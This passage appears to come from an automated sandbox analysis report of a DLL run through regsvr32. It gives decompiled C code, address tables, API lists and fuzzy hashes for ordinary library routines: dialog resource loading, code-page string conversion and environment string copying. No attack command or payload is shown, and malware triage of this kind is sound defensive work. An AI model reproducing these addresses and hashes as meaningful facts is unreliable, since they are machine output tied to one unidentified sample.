                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001c57c
                                                                                                            0x00000000
                                                                                                            0x1001c566
                                                                                                            0x1001c520
                                                                                                            0x1001c523
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001c525
                                                                                                            0x1001c528
                                                                                                            0x1001c52c
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001c52e
                                                                                                            0x1001c52e
                                                                                                            0x1001c52e
                                                                                                            0x1001c531
                                                                                                            0x1001c533
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001c538
                                                                                                            0x1001c53a
                                                                                                            0x1001c53c
                                                                                                            0x1001c542
                                                                                                            0x1001c542
                                                                                                            0x1001c544
                                                                                                            0x1001c547
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001c549
                                                                                                            0x1001c53e
                                                                                                            0x1001c540
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001c540
                                                                                                            0x1001c52e
                                                                                                            0x1001c4fe
                                                                                                            0x1001c500
                                                                                                            0x00000000
                                                                                                            0x1001c500
                                                                                                            0x1001c4ea
                                                                                                            0x1001c4ea
                                                                                                            0x00000000
                                                                                                            0x1001c58e
                                                                                                            0x1001c58e
                                                                                                            0x1001c5a1
                                                                                                            0x1001c5a3
                                                                                                            0x1001c5a6
                                                                                                            0x1001c5a8
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001c5ae
                                                                                                            0x1001c5ba
                                                                                                            0x1001c5bf
                                                                                                            0x1001c5c4
                                                                                                            0x1001c5c7
                                                                                                            0x1001c5e9
                                                                                                            0x1001c5ec
                                                                                                            0x1001c5ee
                                                                                                            0x1001c608
                                                                                                            0x1001c614
                                                                                                            0x1001c61a
                                                                                                            0x1001c61c
                                                                                                            0x1001c6d3
                                                                                                            0x1001c6d3
                                                                                                            0x1001c6d7
                                                                                                            0x1001c6d9
                                                                                                            0x1001c6dc
                                                                                                            0x1001c6e1
                                                                                                            0x1001c6e2
                                                                                                            0x00000000
                                                                                                            0x1001c6e2
                                                                                                            0x1001c637
                                                                                                            0x1001c639
                                                                                                            0x1001c63c
                                                                                                            0x1001c63e
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001c644
                                                                                                            0x1001c654
                                                                                                            0x1001c659
                                                                                                            0x1001c65c
                                                                                                            0x1001c65e
                                                                                                            0x1001c661
                                                                                                            0x1001c67f
                                                                                                            0x1001c681
                                                                                                            0x1001c69a
                                                                                                            0x1001c6a7
                                                                                                            0x1001c6ad
                                                                                                            0x1001c6af
                                                                                                            0x1001c6c3
                                                                                                            0x1001c6c3
                                                                                                            0x1001c6c6
                                                                                                            0x1001c6ca
                                                                                                            0x1001c6cc
                                                                                                            0x1001c6cd
                                                                                                            0x1001c6d2
                                                                                                            0x00000000
                                                                                                            0x1001c683
                                                                                                            0x1001c68d
                                                                                                            0x1001c68f
                                                                                                            0x1001c691
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001c693
                                                                                                            0x00000000
                                                                                                            0x1001c693
                                                                                                            0x1001c5f0
                                                                                                            0x1001c5f4
                                                                                                            0x1001c5f9
                                                                                                            0x1001c5fa
                                                                                                            0x1001c5fd
                                                                                                            0x1001c5ff
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001c605
                                                                                                            0x00000000
                                                                                                            0x1001c605
                                                                                                            0x1001c5ee
                                                                                                            0x1001c4db

                                                                                                            APIs
                                                                                                            • CompareStringW.KERNEL32(00000000,00000000,10042704,00000001,10042704,00000001,10042FA0,00000040,1001BF03,?,00000001,?,00000000,?,00000000,?), ref: 1001C451
                                                                                                            • GetLastError.KERNEL32(?,1001AE49,00000000,00000000,00000000,00000000,00000000,00000000,10018E57,10042CCC,10042CD0,00000018,10019429,10042CE0,00000008,10013474), ref: 1001C463
                                                                                                            • GetCPInfo.KERNEL32(00000000,00000000,10042FA0,00000040,1001BF03,?,00000001,?,00000000,?,00000000,?,?,1001AE49,00000000,00000000), ref: 1001C50D
                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000004,00000000,00000000,?,1001AE49,00000000,00000000,00000000,00000000,00000000,00000000,10018E57,10042CCC), ref: 1001C59B
                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000004,00000190,00000000,?,1001AE49,00000000,00000000,00000000,00000000,00000000,00000000,10018E57,10042CCC), ref: 1001C614
                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,100101C3,00000000,00000000,?,1001AE49,00000000,00000000,00000000,00000000,00000000,00000000,10018E57,10042CCC), ref: 1001C631
                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,100101C3,?,00000000,?,1001AE49,00000000,00000000,00000000,00000000,00000000,00000000,10018E57,10042CCC), ref: 1001C6A7
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ByteCharMultiWide$CompareErrorInfoLastString
                                                                                                            • String ID: @Mv@hvpYv
                                                                                                            • API String ID: 1773772771-4125583295
                                                                                                            • Opcode ID: c77f23d90567df6e736b9aafa9777b77d817b83e23b873e610d66b8219189818
                                                                                                            • Instruction ID: f9a15a39c5567b5c4af314f3663c8d3c96b15f003a3eabc65cf21064ebdc607f
                                                                                                            • Opcode Fuzzy Hash: c77f23d90567df6e736b9aafa9777b77d817b83e23b873e610d66b8219189818
                                                                                                            • Instruction Fuzzy Hash: DCB1897690825EAFDF22CFA4DC95EAE7BF6EF05690F200119F840AA1A1D771D9D0CB50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1001F2DE Relevance: 16.6, APIs: 11, Instructions: 120COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 92%
                                                                                                            			E1001F2DE(intOrPtr* __ecx) {
				signed int _t45;
				void* _t49;
				CHAR* _t50;
				signed int _t54;
				signed char _t60;
				struct HWND__* _t62;
				CHAR* _t63;
				signed int _t68;
				struct HINSTANCE__* _t81;
				void* _t83;
				intOrPtr* _t85;
				void* _t87;
				void* _t89;

				E10011BF0(0x1003a3e8, _t87);
				_t85 = __ecx;
				_t68 =  *(__ecx + 0x5c);
				 *((intOrPtr*)(_t87 - 0x10)) = _t89 - 0x18;
				 *((intOrPtr*)(_t87 - 0x1c)) = __ecx;
				 *(_t87 - 0x18) =  *(__ecx + 0x58);
				_t45 = E100373B5();
				_t81 =  *(_t45 + 0xc);
				if( *(_t85 + 0x54) != 0) {
					_t81 =  *(E100373B5() + 0xc);
					_t45 = LoadResource(_t81, FindResourceA(_t81,  *(_t85 + 0x54), 5));
					 *(_t87 - 0x18) = _t45;
				}
				if( *(_t87 - 0x18) != 0) {
					_t45 = LockResource( *(_t87 - 0x18));
					_t68 = _t45;
				}
				if(_t68 != 0) {
					 *(_t87 - 0x14) = E1001EE1E(_t85);
					E10022196();
					 *(_t87 - 0x20) =  *(_t87 - 0x20) & 0x00000000;
					__eflags =  *(_t87 - 0x14);
					if( *(_t87 - 0x14) != 0) {
						_t62 = GetDesktopWindow();
						__eflags =  *(_t87 - 0x14) - _t62;
						if( *(_t87 - 0x14) != _t62) {
							_t63 = IsWindowEnabled( *(_t87 - 0x14));
							__eflags = _t63;
							if(_t63 != 0) {
								EnableWindow( *(_t87 - 0x14), 0);
								 *(_t87 - 0x20) = 1;
							}
						}
					}
					 *(_t87 - 4) =  *(_t87 - 4) & 0x00000000;
					_push(_t85);
					E100237EE();
					_t49 = E100220EE(_t87,  *(_t87 - 0x14));
					_push(_t81);
					_push(_t49);
					_push(_t68);
					_t50 = E1001F0D1(_t85);
					__eflags = _t50;
					if(_t50 != 0) {
						__eflags =  *(_t85 + 0x38) & 0x00000010;
						if(( *(_t85 + 0x38) & 0x00000010) != 0) {
							_t83 = 4;
							_t60 = E100202AB(_t85);
							__eflags = _t60 & 0x00000001;
							if((_t60 & 0x00000001) != 0) {
								_t83 = 5;
							}
							E10021B92(_t85, _t83);
						}
						__eflags =  *(_t85 + 0x1c);
						if( *(_t85 + 0x1c) != 0) {
							E100204FE(_t85, 0, 0, 0, 0, 0, 0x97);
						}
					}
					 *(_t87 - 4) =  *(_t87 - 4) | 0xffffffff;
					__eflags =  *(_t87 - 0x20);
					if( *(_t87 - 0x20) != 0) {
						EnableWindow( *(_t87 - 0x14), 1);
					}
					__eflags =  *(_t87 - 0x14);
					if(__eflags != 0) {
						__eflags = GetActiveWindow() -  *(_t85 + 0x1c);
						if(__eflags == 0) {
							SetActiveWindow( *(_t87 - 0x14));
						}
					}
					 *((intOrPtr*)( *_t85 + 0x60))();
					E1001EE58(_t85, __eflags);
					__eflags =  *(_t85 + 0x54);
					if( *(_t85 + 0x54) != 0) {
						FreeResource( *(_t87 - 0x18));
					}
					_t54 =  *(_t85 + 0x40);
				} else {
					_t54 = _t45 | 0xffffffff;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t87 - 0xc));
				return _t54;
			}
















                                                                                                            0x1001f2e3
                                                                                                            0x1001f2ed
                                                                                                            0x1001f2f2
                                                                                                            0x1001f2f6
                                                                                                            0x1001f2f9
                                                                                                            0x1001f2fc
                                                                                                            0x1001f2ff
                                                                                                            0x1001f308
                                                                                                            0x1001f30b
                                                                                                            0x1001f312
                                                                                                            0x1001f323
                                                                                                            0x1001f329
                                                                                                            0x1001f329
                                                                                                            0x1001f330
                                                                                                            0x1001f335
                                                                                                            0x1001f33b
                                                                                                            0x1001f33b
                                                                                                            0x1001f33f
                                                                                                            0x1001f350
                                                                                                            0x1001f353
                                                                                                            0x1001f358
                                                                                                            0x1001f35c
                                                                                                            0x1001f360
                                                                                                            0x1001f362
                                                                                                            0x1001f368
                                                                                                            0x1001f36b
                                                                                                            0x1001f370
                                                                                                            0x1001f376
                                                                                                            0x1001f378
                                                                                                            0x1001f37f
                                                                                                            0x1001f385
                                                                                                            0x1001f385
                                                                                                            0x1001f378
                                                                                                            0x1001f36b
                                                                                                            0x1001f38c
                                                                                                            0x1001f390
                                                                                                            0x1001f391
                                                                                                            0x1001f399
                                                                                                            0x1001f39e
                                                                                                            0x1001f39f
                                                                                                            0x1001f3a0
                                                                                                            0x1001f3a3
                                                                                                            0x1001f3aa
                                                                                                            0x1001f3ac
                                                                                                            0x1001f3ae
                                                                                                            0x1001f3b2
                                                                                                            0x1001f3b6
                                                                                                            0x1001f3b9
                                                                                                            0x1001f3be
                                                                                                            0x1001f3c1
                                                                                                            0x1001f3c5
                                                                                                            0x1001f3c5
                                                                                                            0x1001f3c9
                                                                                                            0x1001f3c9
                                                                                                            0x1001f3ce
                                                                                                            0x1001f3d1
                                                                                                            0x1001f3df
                                                                                                            0x1001f3df
                                                                                                            0x1001f3d1
                                                                                                            0x1001f400
                                                                                                            0x1001f404
                                                                                                            0x1001f407
                                                                                                            0x1001f40e
                                                                                                            0x1001f40e
                                                                                                            0x1001f414
                                                                                                            0x1001f417
                                                                                                            0x1001f41f
                                                                                                            0x1001f422
                                                                                                            0x1001f427
                                                                                                            0x1001f427
                                                                                                            0x1001f422
                                                                                                            0x1001f431
                                                                                                            0x1001f436
                                                                                                            0x1001f43b
                                                                                                            0x1001f43e
                                                                                                            0x1001f443
                                                                                                            0x1001f443
                                                                                                            0x1001f449
                                                                                                            0x1001f341
                                                                                                            0x1001f341
                                                                                                            0x1001f341
                                                                                                            0x1001f451
                                                                                                            0x1001f45a

                                                                                                            APIs
                                                                                                            • __EH_prolog.LIBCMT ref: 1001F2E3
                                                                                                            • FindResourceA.KERNEL32(?,00000000,00000005), ref: 1001F31B
                                                                                                            • LoadResource.KERNEL32(?,00000000,?,?,?,?,?,?,?,00000064,00000000), ref: 1001F323
                                                                                                              • Part of subcall function 10022196: UnhookWindowsHookEx.USER32(?), ref: 100221BB
                                                                                                            • LockResource.KERNEL32(00000000,?,?,?,?,?,?,?,00000064,00000000), ref: 1001F335
                                                                                                            • GetDesktopWindow.USER32 ref: 1001F362
                                                                                                            • IsWindowEnabled.USER32(00000000), ref: 1001F370
                                                                                                            • EnableWindow.USER32(00000000,00000000), ref: 1001F37F
                                                                                                            • EnableWindow.USER32(00000000,00000001), ref: 1001F40E
                                                                                                            • GetActiveWindow.USER32 ref: 1001F419
                                                                                                            • SetActiveWindow.USER32(00000000,?,?,?,?,?,?,?,?,00000064,00000000), ref: 1001F427
                                                                                                            • FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000064,00000000), ref: 1001F443
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$Resource$ActiveEnable$DesktopEnabledFindFreeH_prologHookLoadLockUnhookWindows
                                                                                                            • String ID:
                                                                                                            • API String ID: 833315621-0
                                                                                                            • Opcode ID: 36a7553cafaefb879fb01c6852922989da2301ce548023a2a0f367a123b38a93
                                                                                                            • Instruction ID: 07bae71fa05b1da8482edcdebb19160d7d4844d0efed804ca524429d20d1f7a4
                                                                                                            • Opcode Fuzzy Hash: 36a7553cafaefb879fb01c6852922989da2301ce548023a2a0f367a123b38a93
                                                                                                            • Instruction Fuzzy Hash: D14190359007199FDB12DFA5C889BBEB7F5FF14751F10011DF102AA1A2CB74AA81CB61
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1001A487 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 169COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 86%
                                                                                                            			E1001A487(void* __ebx, void* __edi, int __esi, void* __eflags) {
				intOrPtr _t54;
				int _t56;
				char* _t57;
				int _t68;
				char* _t69;
				int _t70;
				int _t73;
				void* _t77;
				int _t81;
				short* _t82;
				void* _t97;
				short* _t98;

				_t94 = __esi;
				_push(0x38);
				_push(0x10042f10);
				E10012514(__ebx, __edi, __esi);
				_t54 =  *0x1004c470; // 0xf3933a06
				 *((intOrPtr*)(_t97 - 0x1c)) = _t54;
				 *(_t97 - 0x34) = 0;
				 *(_t97 - 0x44) = 0;
				_t81 =  *( *(_t97 + 0x14));
				 *(_t97 - 0x40) = _t81;
				 *(_t97 - 0x3c) = 0;
				_t56 =  *(_t97 + 8);
				if(_t56 ==  *(_t97 + 0xc)) {
					_t82 =  *(_t97 - 0x48);
					goto L31;
				} else {
					_t85 = _t97 - 0x30;
					if(GetCPInfo(_t56, _t97 - 0x30) != 0 &&  *(_t97 - 0x30) == 1 && GetCPInfo( *(_t97 + 0xc), _t97 - 0x30) != 0 &&  *(_t97 - 0x30) == 1) {
						 *(_t97 - 0x3c) = 1;
					}
					if( *(_t97 - 0x3c) == 0) {
						_t94 =  *(_t97 - 0x38);
					} else {
						if(_t81 == 0xffffffff) {
							_t77 = E10011820( *(_t97 + 0x10));
							_pop(_t85);
							_t94 = _t77 + 1;
							__eflags = _t94;
						} else {
							_t94 = _t81;
						}
						 *(_t97 - 0x38) = _t94;
					}
					if( *(_t97 - 0x3c) != 0) {
						L14:
						 *(_t97 - 4) = 0;
						E10010B20(_t94 + _t94 + 0x00000003 & 0xfffffffc, _t85);
						 *(_t97 - 0x18) = _t98;
						_t82 = _t98;
						 *(_t97 - 0x48) = _t82;
						E10011C50(_t82, 0, _t94 + _t94);
						 *(_t97 - 4) =  *(_t97 - 4) | 0xffffffff;
						_t111 = _t82;
						if(_t82 != 0) {
							L19:
							_t68 = MultiByteToWideChar( *(_t97 + 8), 1,  *(_t97 + 0x10),  *(_t97 - 0x40), _t82, _t94);
							__eflags = _t68;
							if(_t68 == 0) {
								L31:
								__eflags =  *(_t97 - 0x44);
								if(__eflags != 0) {
									_push(_t82);
									E100107C8(_t82, 0, _t94, __eflags);
								}
								_t57 =  *(_t97 - 0x34);
								goto L34;
							}
							__eflags =  *(_t97 + 0x18);
							if( *(_t97 + 0x18) == 0) {
								__eflags =  *(_t97 - 0x3c);
								if(__eflags != 0) {
									L25:
									_push(_t94);
									_push(1);
									_t69 = E1001382A(_t82, 0, _t94, __eflags);
									 *(_t97 - 0x34) = _t69;
									__eflags = _t69;
									if(_t69 != 0) {
										_t70 = WideCharToMultiByte( *(_t97 + 0xc), 0, _t82, _t94, _t69, _t94, 0, 0);
										__eflags = _t70;
										if(__eflags != 0) {
											__eflags =  *(_t97 - 0x40) - 0xffffffff;
											if( *(_t97 - 0x40) != 0xffffffff) {
												 *( *(_t97 + 0x14)) = _t70;
											}
										} else {
											_push( *(_t97 - 0x34));
											E100107C8(_t82, 0, _t94, __eflags);
											 *(_t97 - 0x34) = 0;
										}
									}
									goto L31;
								}
								_t94 = WideCharToMultiByte( *(_t97 + 0xc), 0, _t82, _t94, 0, 0, 0, 0);
								__eflags = _t94;
								if(__eflags == 0) {
									goto L31;
								}
								goto L25;
							}
							_t73 = WideCharToMultiByte( *(_t97 + 0xc), 0, _t82, _t94,  *(_t97 + 0x18),  *(_t97 + 0x1c), 0, 0);
							__eflags = _t73;
							if(_t73 != 0) {
								 *(_t97 - 0x34) =  *(_t97 + 0x18);
							}
							goto L31;
						} else {
							_push(_t94);
							_push(2);
							_t82 = E1001382A(_t82, 0, _t94, _t111);
							if(_t82 != 0) {
								 *(_t97 - 0x44) = 1;
								goto L19;
							}
							goto L17;
						}
					} else {
						_t94 = MultiByteToWideChar( *(_t97 + 8), 1,  *(_t97 + 0x10), _t81, 0, 0);
						 *(_t97 - 0x38) = _t94;
						if(_t94 == 0) {
							L17:
							_t57 = 0;
							L34:
							return E1001254F(E100117AE(_t57,  *((intOrPtr*)(_t97 - 0x1c))));
						}
						goto L14;
					}
				}
			}















                                                                                                            0x1001a487
                                                                                                            0x1001a487
                                                                                                            0x1001a489
                                                                                                            0x1001a48e
                                                                                                            0x1001a493
                                                                                                            0x1001a498
                                                                                                            0x1001a49d
                                                                                                            0x1001a4a0
                                                                                                            0x1001a4a6
                                                                                                            0x1001a4a8
                                                                                                            0x1001a4ab
                                                                                                            0x1001a4ae
                                                                                                            0x1001a4b4
                                                                                                            0x1001a62d
                                                                                                            0x00000000
                                                                                                            0x1001a4ba
                                                                                                            0x1001a4ba
                                                                                                            0x1001a4c9
                                                                                                            0x1001a4e4
                                                                                                            0x1001a4e4
                                                                                                            0x1001a4ee
                                                                                                            0x1001a50a
                                                                                                            0x1001a4f0
                                                                                                            0x1001a4f3
                                                                                                            0x1001a4fc
                                                                                                            0x1001a501
                                                                                                            0x1001a504
                                                                                                            0x1001a504
                                                                                                            0x1001a4f5
                                                                                                            0x1001a4f5
                                                                                                            0x1001a4f5
                                                                                                            0x1001a505
                                                                                                            0x1001a505
                                                                                                            0x1001a510
                                                                                                            0x1001a52c
                                                                                                            0x1001a52c
                                                                                                            0x1001a538
                                                                                                            0x1001a53d
                                                                                                            0x1001a540
                                                                                                            0x1001a542
                                                                                                            0x1001a54b
                                                                                                            0x1001a553
                                                                                                            0x1001a570
                                                                                                            0x1001a572
                                                                                                            0x1001a592
                                                                                                            0x1001a59f
                                                                                                            0x1001a5a5
                                                                                                            0x1001a5a7
                                                                                                            0x1001a630
                                                                                                            0x1001a630
                                                                                                            0x1001a633
                                                                                                            0x1001a635
                                                                                                            0x1001a636
                                                                                                            0x1001a63b
                                                                                                            0x1001a63c
                                                                                                            0x00000000
                                                                                                            0x1001a63c
                                                                                                            0x1001a5ad
                                                                                                            0x1001a5b0
                                                                                                            0x1001a5d2
                                                                                                            0x1001a5d5
                                                                                                            0x1001a5ed
                                                                                                            0x1001a5ed
                                                                                                            0x1001a5ee
                                                                                                            0x1001a5f0
                                                                                                            0x1001a5f7
                                                                                                            0x1001a5fa
                                                                                                            0x1001a5fc
                                                                                                            0x1001a608
                                                                                                            0x1001a60e
                                                                                                            0x1001a610
                                                                                                            0x1001a620
                                                                                                            0x1001a624
                                                                                                            0x1001a629
                                                                                                            0x1001a629
                                                                                                            0x1001a612
                                                                                                            0x1001a612
                                                                                                            0x1001a615
                                                                                                            0x1001a61b
                                                                                                            0x1001a61b
                                                                                                            0x1001a610
                                                                                                            0x00000000
                                                                                                            0x1001a5fc
                                                                                                            0x1001a5e7
                                                                                                            0x1001a5e9
                                                                                                            0x1001a5eb
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001a5eb
                                                                                                            0x1001a5c0
                                                                                                            0x1001a5c6
                                                                                                            0x1001a5c8
                                                                                                            0x1001a5cd
                                                                                                            0x1001a5cd
                                                                                                            0x00000000
                                                                                                            0x1001a574
                                                                                                            0x1001a574
                                                                                                            0x1001a575
                                                                                                            0x1001a57e
                                                                                                            0x1001a582
                                                                                                            0x1001a58b
                                                                                                            0x00000000
                                                                                                            0x1001a58b
                                                                                                            0x00000000
                                                                                                            0x1001a582
                                                                                                            0x1001a512
                                                                                                            0x1001a523
                                                                                                            0x1001a525
                                                                                                            0x1001a52a
                                                                                                            0x1001a584
                                                                                                            0x1001a584
                                                                                                            0x1001a63f
                                                                                                            0x1001a64f
                                                                                                            0x1001a64f
                                                                                                            0x00000000
                                                                                                            0x1001a52a
                                                                                                            0x1001a510

                                                                                                            APIs
                                                                                                            • GetCPInfo.KERNEL32(00000000,?,10042F10,00000038,100185C0,?,00000000,00000000,10012C1E,00000000,00000000,10042730,0000001C,1001294D,00000001,00000020), ref: 1001A4C5
                                                                                                            • GetCPInfo.KERNEL32(00000000,00000001), ref: 1001A4D8
                                                                                                            • _strlen.LIBCMT ref: 1001A4FC
                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000001,10012C1E,?,00000000,00000000), ref: 1001A51D
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Info$ByteCharMultiWide_strlen
                                                                                                            • String ID: @hvpYv
                                                                                                            • API String ID: 1335377746-2766943729
                                                                                                            • Opcode ID: a1739f8af5073df943149c03816b326863122fdfa87c5946c56ad2dc74c300ca
                                                                                                            • Instruction ID: 70101fa7554b3a37292e61141452f95f373fba0d19c42cfe0f4ebf6b77a3f96e
                                                                                                            • Opcode Fuzzy Hash: a1739f8af5073df943149c03816b326863122fdfa87c5946c56ad2dc74c300ca
                                                                                                            • Instruction Fuzzy Hash: 99514671900619ABDF21CFA5DC84D9EBBF9FF867A0B24411AF814AA190D7309DC1CB60
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1001666B Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 131COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 98%
                                                                                                            			E1001666B() {
				int _v4;
				int _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t7;
				CHAR* _t8;
				WCHAR* _t16;
				int _t19;
				char* _t23;
				int _t24;
				long _t28;
				int _t29;
				void* _t34;
				intOrPtr _t35;
				WCHAR* _t36;
				CHAR* _t37;
				intOrPtr _t38;
				int _t40;

				_t7 =  *0x1004f700; // 0x1
				_t29 = 0;
				_t36 = 0;
				_t38 = 2;
				if(_t7 != 0) {
					L6:
					__eflags = _t7 - 1;
					if(__eflags != 0) {
						__eflags = _t7 - _t38;
						if(_t7 == _t38) {
							L21:
							_t8 = GetEnvironmentStrings();
							_t37 = _t8;
							__eflags = _t37 - _t29;
							if(_t37 == _t29) {
								L20:
								return 0;
							}
							__eflags =  *_t37 - _t29;
							if( *_t37 == _t29) {
								L25:
								_t39 = _t8 - _t37 + 1;
								_t34 = E100107B6(_t8 - _t37 + 1);
								__eflags = _t34 - _t29;
								if(_t34 != _t29) {
									E10011440(_t34, _t37, _t39);
								} else {
									_t34 = 0;
								}
								FreeEnvironmentStringsA(_t37);
								return _t34;
							} else {
								goto L23;
							}
							do {
								do {
									L23:
									_t8 =  &(_t8[1]);
									__eflags =  *_t8 - _t29;
								} while ( *_t8 != _t29);
								_t8 =  &(_t8[1]);
								__eflags =  *_t8 - _t29;
							} while ( *_t8 != _t29);
							goto L25;
						}
						__eflags = _t7 - _t29;
						if(_t7 == _t29) {
							goto L21;
						}
						goto L20;
					}
					L7:
					if(_t36 != _t29) {
						L9:
						_t16 = _t36;
						if( *_t36 == _t29) {
							L12:
							_t35 = __imp__WideCharToMultiByte; // 0x76ec6840
							_t19 = (_t16 - _t36 >> 1) + 1;
							_v4 = _t19;
							_t40 = WideCharToMultiByte(_t29, _t29, _t36, _t19, _t29, _t29, _t29, _t29);
							if(_t40 != _t29) {
								_t23 = E100107B6(_t40);
								_v8 = _t23;
								if(_t23 != _t29) {
									_t24 = WideCharToMultiByte(_t29, _t29, _t36, _v4, _t23, _t40, _t29, _t29);
									_t52 = _t24;
									if(_t24 == 0) {
										_push(_v8);
										E100107C8(_t29, _t35, _t36, _t52);
										_v8 = _t29;
									}
									_t29 = _v8;
								}
							}
							FreeEnvironmentStringsW(_t36);
							return _t29;
						} else {
							goto L10;
						}
						do {
							do {
								L10:
								_t16 = _t16 + _t38;
							} while ( *_t16 != _t29);
							_t16 = _t16 + _t38;
						} while ( *_t16 != _t29);
						goto L12;
					}
					_t36 = GetEnvironmentStringsW();
					if(_t36 == _t29) {
						goto L20;
					}
					goto L9;
				}
				_t36 = GetEnvironmentStringsW();
				if(_t36 == 0) {
					_t28 = GetLastError();
					__eflags = _t28 - 0x78;
					if(_t28 != 0x78) {
						_t7 =  *0x1004f700; // 0x1
					} else {
						_t7 = _t38;
						 *0x1004f700 = _t7;
					}
					goto L6;
				} else {
					 *0x1004f700 = 1;
					goto L7;
				}
			}























                                                                                                            0x1001666d
                                                                                                            0x1001667c
                                                                                                            0x1001667e
                                                                                                            0x10016684
                                                                                                            0x10016685
                                                                                                            0x100166b4
                                                                                                            0x100166b4
                                                                                                            0x100166b7
                                                                                                            0x10016736
                                                                                                            0x10016738
                                                                                                            0x10016742
                                                                                                            0x10016742
                                                                                                            0x10016748
                                                                                                            0x1001674a
                                                                                                            0x1001674c
                                                                                                            0x1001673e
                                                                                                            0x00000000
                                                                                                            0x1001673e
                                                                                                            0x1001674e
                                                                                                            0x10016750
                                                                                                            0x1001675c
                                                                                                            0x1001675f
                                                                                                            0x10016767
                                                                                                            0x10016769
                                                                                                            0x1001676c
                                                                                                            0x10016775
                                                                                                            0x1001676e
                                                                                                            0x1001676e
                                                                                                            0x1001676e
                                                                                                            0x1001677e
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10016752
                                                                                                            0x10016752
                                                                                                            0x10016752
                                                                                                            0x10016752
                                                                                                            0x10016753
                                                                                                            0x10016753
                                                                                                            0x10016757
                                                                                                            0x10016758
                                                                                                            0x10016758
                                                                                                            0x00000000
                                                                                                            0x10016752
                                                                                                            0x1001673a
                                                                                                            0x1001673c
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001673c
                                                                                                            0x100166b9
                                                                                                            0x100166bb
                                                                                                            0x100166c5
                                                                                                            0x100166c8
                                                                                                            0x100166ca
                                                                                                            0x100166da
                                                                                                            0x100166da
                                                                                                            0x100166e8
                                                                                                            0x100166ed
                                                                                                            0x100166f3
                                                                                                            0x100166f7
